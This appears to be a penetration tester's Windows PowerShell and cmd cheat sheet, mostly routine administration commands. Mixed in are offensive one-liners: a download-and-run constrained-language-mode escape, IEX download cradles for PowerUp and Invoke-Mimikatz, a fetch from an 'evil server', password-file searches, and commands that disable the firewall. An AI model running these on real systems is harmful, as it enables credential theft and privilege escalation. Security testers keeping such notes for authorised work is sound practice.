Windows (Powershell & cmd)¶

Powershell Commands¶

Useful Cmdlets (and aliases)¶

What it does	Command	aliases
Get directory listing	Get-ChildItem	ls, dir, gci
Copy a file	`Copy-Item src.txt dst.txt`	cp, copy, cpi
Move a file	`Move-Item src.txt dst.txt`	mv, move, mi
Find text within a file (1)	`Select-String -path c:\users\*.txt -pattern password`
Find text within a file (2)	`ls -r c:\users -file \\| % {Select-String -path $_ -pattern password}`
Display file contents	`Get-Content file.txt`	cat, type, gc)
Get present directory	`Get-Location`	pwd, gl
Get a process listing	`Get-Process`	ps, gps
Get a service listing	`Get-Service`
Formatting output (Format-List)	`ls \\| Format-List -property name`
Paginating output	`ls -r \\| Out-Host -paging`
Get the SHA1 hash of a file	`Get-FileHash -Algorithm SHA1 file.txt`
Exporting output to CSV	`Get-Process \\| Export-Csv procs.csv`

Info gathering:¶

Working with Zip files:

Expand-Archive -Path Draft.Zip -DestinationPath C:\Reference
Expand-Archive -Path Draft.Zip

https://stackoverflow.com/questions/9682024/how-to-do-what-head-tail-more-less-sed-do-in-powershell/41626586
gc log.txt | select -first 10 # head
gc -TotalCount 10 log.txt     # also head
gc log.txt | select -last 10  # tail
gc -Tail 10 log.txt           # also tail (since PSv3), also much faster than above option
gc log.txt | more             # or less if you have it installed
gc log.txt | %{ $_ -replace '\d+', '($0)' }         # sed

CMD stuff¶

cipher /U /N

Alternate Data Stream https://www.howtogeek.com/howto/windows-vista/stupid-geek-tricks-hide-data-in-a-secret-text-file-compartment/

Language Mode¶

Check current language mode¶

$ExecutionContext.SessionState.LanguageMode

Escape Constrained Language Mode¶

Using psby.exe obtained from here: https://github.com/Resilient-Ninja/Privilege-Escalation-Windows

PS > Invoke-WebRequest -Uri http://10.10.14.25/psby.exe -OutFile C:\windows\system32\spool\drivers\color\psby.exe

PS > C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=true /U C:\windows\system32\spool\drivers\color\psby.exe

https://techvomit.net/useful-powershell-commands/

Where is a binary:¶

C:\Windows\System32\where.exe cmd.exe

Print environment variable:¶

echo $Env:Temp

Check if system is 64 bit¶

[Environment]::Is64BitOperatingSystem

Enable ISE using Powershell¶

Import-Module ServerManager
Add-WindowsFeature Powershell-ISE

securely store credentials in xml for import¶

$cred = Get-Credential
$cred | Export-CliXml <location>.clixml
$cred2 = Import-CliXml <location>.clixml

command output to file¶

| Out-File <location>
Invoke-AllChecks | Out-File C:\temp\output.txt

command output to clipboard¶

Command | Clip

download file¶

Invoke-WebRequest -Uri $url -OutFile $output
(New-Object System.Net.WebClient).DownloadFile($url, $output)

Start-BitsTransfer -Source $url -Destination $output
Start-BitsTransfer -Source $url -Destination $output -Asynchronous

powershell -exec bypass -c "(New-Object Net.WebClient).DownloadFile('http://192.168.1.3','C:\temp\launcher.bat')"

Download Powerup With Powershell <= V.2.0¶

$WebClient = New-Object System.Net.WebClient
$WebClient.DownloadFile("https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Privesc/PowerUp.ps1","C:\Temp\PowerUp.ps1")

# one-liner alternative:
(New-Object System.Net.WebClient).DownloadFile("https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Privesc/PowerUp.ps1","C:\Temp\PowerUp.ps1")


# another one:
powershell.exe -ep bypass -e IEX ((new-object net.webclient).downloadstring('http://target.com:8080/robots.txt'))

USING POWERUP¶

import-module c:\PowerUp\powerup.ps1
# Run all the checks
Invoke-AllChecks

PowerUp one-liner¶

#Get PowerUp, run it, and output to a text file so we can read the output easily.
powershell.exe -NoP -NonI -Exec Bypass IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Privesc/PowerUp.ps1'); Invoke-AllChecks > C:\Temp\PU.txt

Powershell MIMIKATZ¶

powershell.exe -NoP -NonI -Exec Bypass IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/cheetz/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz

Tail a logfile¶

# You can effectively tail -f the last two lines from a log file with the following:
Get-Content logfile.log -Tail 2 –Wait

Run powershell script to get around execution of scripts disabled error¶

powershell -ExecutionPolicy Bypass -File <file>.ps1

Download SYSINTERNALS¶

# First you need to ignore ssl trust:
[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true}

# then you can download it:
(New-Object System.Net.WebClient).DownloadFile("https://download.sysinternals.com/files/SysinternalsSuite.zip","C:\Temp\sysinternals.zip")

Get hostname:¶

$env:computername

List local accounts on a system:¶

Get-WmiObject -Class Win32_UserAccount -Filter "LocalAccount='True'"

Check if system is joined to a domain or a workgroup:¶

if ((gwmi win32_computersystem).partofdomain -eq $true) { write-host -fore green 'This system is on a domain' } else { write-host -fore red 'This system is part of a workgroup' }

SET ENVIRONMENT VARIABLE¶

$env:<name>="stuff"

SHOW ENV VARS IN RUNNING SCRIPT¶

gci env:* | sort-object <name>
Resource: https://stackoverflow.com/questions/39800481/display-all-environment-variables-from-running-powershell-script

Get list of running processes:¶

Get-Process

Get-WmiObject win32_process | Select-Object Name,@{n='Owner';e={$_.GetOwner().User}}

CHECK IF SYSTEM IS RUNNING A DESKTOP VERSION OF WINDOWS¶

$windesktop = (gwmi win32_operatingsystem).OperatingSystemSKU -notmatch "(\b[7-9]|10|1[2-5]|1[7-9]|2[0-5])"
if ($windesktop)
{
    write-output "OS is a flavor of Windows Desktop"
}

GET WINDOWS KERNEL VERSION¶

[Environment]::OSVersion.Version

GET LIST OF IPV4 ADDR¶

(gwmi Win32_NetworkAdapterConfiguration | ? { $_.IPAddress -ne $null }).ipaddress

CHANGE HOSTNAME¶

Get-WmiObject -Class Win32_ComputerSystem
$ComputerInfo.Rename("new_name")

LOG SCRIPT OUTPUT TO FILE¶

Start-Transcript -path c:\windows\temp\interesting.log -Append -force

# do stuff

stop-transcript
exit 1001

WGET¶

wget http://<evil server>/evil.exe -Outfile evil.exe

Check Permissions For Folder¶

icacls <path>

NETSTAT WITH FIND¶

# This is an example of what I equate to running netstat and piping the results through grep in linux. In powershell however, you need to escape the double ticks or it will throw an error:

netstat -anob  | find `"443`"

Look for files with passwords:¶

dir /b /s web.config
dir /b /s unattend.xml
dir /b /s sysprep.inf
dir /b /s sysprep.xml
dir /b /s *pass*

Disable firewall¶

netsh advfirewall set allprofiles state off

Make administrator user active¶

net user administrator /active:yes

Set user password to never expire¶

net user user /expires:never /active:yes /logonpasswordchg:no

Netstat (show listening ports):¶

cmd /c "netstat -a"

CMD¶

Useful cmd one-liners:¶

Open event viewer from cmd:

eventvwr

View the status of a service:

sc query <service name>

Stop service:

sc stop <service name>

Start service:

sc start <servicename>

Open services msc:

services.msc

Lists all the service information for each process:

tasklist /svc

Kill a process by PID:

taskkill /pid <pid> /f

Kill firefox (or any process) by name:

taskkill /im firefox.exe /f

Delete a file:

del <file name>

List drives:

fsutil fsinfo drives

Show users with active sessions:

quser or query user

Show active network sessions:

netstat -vb

Get last modified file in a directory (conceptually similar to ls -lart):

dir /O:D /T:W /A:-D

Rename file:

move file new-file-name

Show contents of file:

type file.txt

Current current user and privilege info

whoami /all

List users

net users

List domain users and output to a file

net user /domain > domain-user-list.txt

List domain controller the current system is authenticated with

echo %LOGONSERVER%

Get FSMO roles for current domain (useful info about domain controller setup)

NETDOM QUERY /D:targetdomain.com FSMO

List all domain controllers in the current domain

net group "Domain Controllers" /domain

Print password policy

net accounts

Reboot system

shutdown -r

Query the registry

reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run

Remove a key from the registry

reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Run\ /v hFaZvOAsF /f

Show environment variables

set